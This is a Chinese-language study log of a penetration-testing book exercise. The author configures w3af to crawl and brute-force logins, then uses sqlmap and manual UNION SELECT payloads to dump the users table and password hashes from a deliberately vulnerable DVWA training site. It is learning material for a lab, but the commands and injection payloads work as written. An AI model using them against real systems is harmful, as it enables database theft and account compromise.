p128 wmap
和昨天一样,我用这些漏洞扫描工具去扫testfire.net或者owaspbwa都扫不出漏洞!不明白!
补充:原来是网络不知道啥时候自己断了。连上后再次扫描就成功了:
p134 扫描神奇w3af
# w3af_console w3af>>> plugins w3af/plugins>>> bruteforce form_auth w3af/plugins>>> bruteforce config form_auth w3af/plugins/bruteforce/config:form_auth>>> set passwdFile /usr/share /w3af/w3af/core/controllers/bruteforce/passwords.txt w3af/plugins/bruteforce/config:form_auth>>> set usersFile /usr/share/w3af/w3af/core/controllers/bruteforce/users.txt w3af/plugins/bruteforce/config:form_auth>>> back w3af/plugins>>> audit xss sqli
w3af/plugins>>> discovery webSpider Unknown command 'discovery' w3af/plugins>>> help |-----------------------------------------------------------------------------| | list | List available plugins. | |-----------------------------------------------------------------------------| | back | Go to the previous menu. | | exit | Exit w3af. | |-----------------------------------------------------------------------------| | audit | View, configure and enable audit plugins | | infrastructure | View, configure and enable infrastructure plugins | | grep | View, configure and enable grep plugins | | crawl | View, configure and enable crawl plugins | | evasion | View, configure and enable evasion plugins | | bruteforce | View, configure and enable bruteforce plugins | | auth | View, configure and enable auth plugins | | output | View, configure and enable output plugins | | mangle | View, configure and enable mangle plugins | |-----------------------------------------------------------------------------|
看来书中所说的discovery模块不在了。网上查一下,discovery模块改成crawl模块了。继续:
w3af/plugins>>> crawl web_spider w3af/plugins>>> crawl config web_spider w3af/plugins/crawl/config:web_spider>>> set only_forward True w3af/plugins/crawl/config:web_spider>>> back The configuration has been saved. w3af/plugins>>> back
基本功能配置完成!继续对扫描的目标和结果存储形式进行配置:
w3af>>> target w3af/config:target>>> set target http://www.dvssc.com/dvwa/index.php w3af/config:target>>> back The configuration has been saved. w3af>>> plugins w3af/plugins>>> output html_file w3af/plugins>>> output config html_file w3af/plugins/output/config:html_file>>> set verbose True w3af/plugins/output/config:html_file>>> back The configuration has been saved. w3af/plugins>>> back
w3af>>> star
扫到结果:
p137 SQL注入漏洞探测
在kali 2.0中
msf > use auxiliary/scanner/http/sqlmap
[-] Failed to load module: auxiliary/scanner/http/sqlmap
看来是删掉这个模块了。干脆直接在terminal内使用sqlmap。
先安装一个火狐的插件,叫做Tamper Data,可以用来查看和更改web应用在后台提交的参数,例如POST参数、cookie值等。
通过注入以admin身份登录到dvssc.com的SQL Injection训练页面。
提交任意数据,用Tamper Data截获url和cookies,然后使用
# sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=a&Submit=Submit#' --cookie='security=low; PHPSESSID=ov3jmigsemo6d47367co53qq24'
得到结果:
Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: id=-3209' OR 1543=1543#&Submit=Submit Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: id=-3023' OR 1 GROUP BY CONCAT(0x7178716a71,(SELECT (CASE WHEN (4203=4203) THEN 1 ELSE 0 END)),0x7178627671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&Submit=Submit Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment) Payload: id=a' AND (SELECT * FROM (SELECT(SLEEP(5)))fHGe)#&Submit=Submit Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: id=a' UNION ALL SELECT CONCAT(0x7178716a71,0x4e4b7872695163554f65444d6e4a4f59764f54616879767062516e576373624d726e545a6b727472,0x7178627671),NULL#&Submit=Submit --- [12:21:15] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 10.04 (Lucid Lynx) web application technology: PHP 5.3.2, Apache 2.2.14 back-end DBMS: MySQL 5.0.12 [12:21:15] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.dvssc.com' [*] shutting down at 12:21:15
接下来探测MySQL中存放web应用数据的数据库名称。只要在之前命令最后加上--dbs(探测数据库名称)和-v 0(verbose level)即可:
# sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=bb&Submit=Submit#' --cookie='security=low; PHPSESSID=ov3jmigsemo6d47367co53qq24' --dbs -v 0 --snip-- available databases [2]: [*] dvwa [*] information_schema [*] shutting down at 12:32:39
information_schema是MySQL的默认系统数据库,所以我们把注意力放在dvwa,探测其中存在的表名:
# sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=bb&Submit=Submit#' --cookie='security=low; PHPSESSID=ov3jmigsemo6d47367co53qq24' -D dvwa --tables --snip-- [12:35:54] [INFO] fetching tables for database: 'dvwa' [12:35:54] [WARNING] reflective value(s) found and filtering out Database: dvwa [2 tables] +-----------+ | guestbook | | users | +-----------+
探测users中的字段列表,发现其中有个password,哈哈!把里面的内容都搞出来:
# sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=bb&Submit=Submit#' --cookie='security=low; PHPSESSID=ov3jmigsemo6d47367co53qq24' -D dvwa --tables -T users --columns # sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=bb&Submit=Submit#' --cookie='security=low; PHPSESSID=ov3jmigsemo6d47367co53qq24' -D dvwa --tables -T users --columns --dump
[12:39:56] [INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/www.dvssc.com/dump/dvwa/users.csv'
查看users.csv,里面admin的密码通过md5加密,google一下就知道密码是admin了。
p150 SQL注入实例分析
登录www.dvssc.com的sql injection训练界面,要先将安全等级调到最低。
使用union注入时,如果列数和实际的表中的不一样就会报错:
比如注入
' UNION SELECT 1,2,3--'
报错
The used SELECT statements have a different number of columns
继续,通过查询INFORMATION_SCHEMA系统表,就可以看到这个MySQL数据库中每一个表的名字及每一列的名字等:
' UNION SELECT 1, table_name FROM INFORMATION_SCHEMA.tables -- ' (最后注释符号 -- 和 ' 之间要有空格才行!)
' UNION SELECT 1, column_name FROM INFORMATION_SCHEMA.column WHERE table_name='users' -- '
' UNION SELECT 1, password FROM users -- '
' UNION SELECT password, concat(first_name, ' ', last_name, ' ', user) FROM users -- ' (通过concat()函数可以获得更多信息)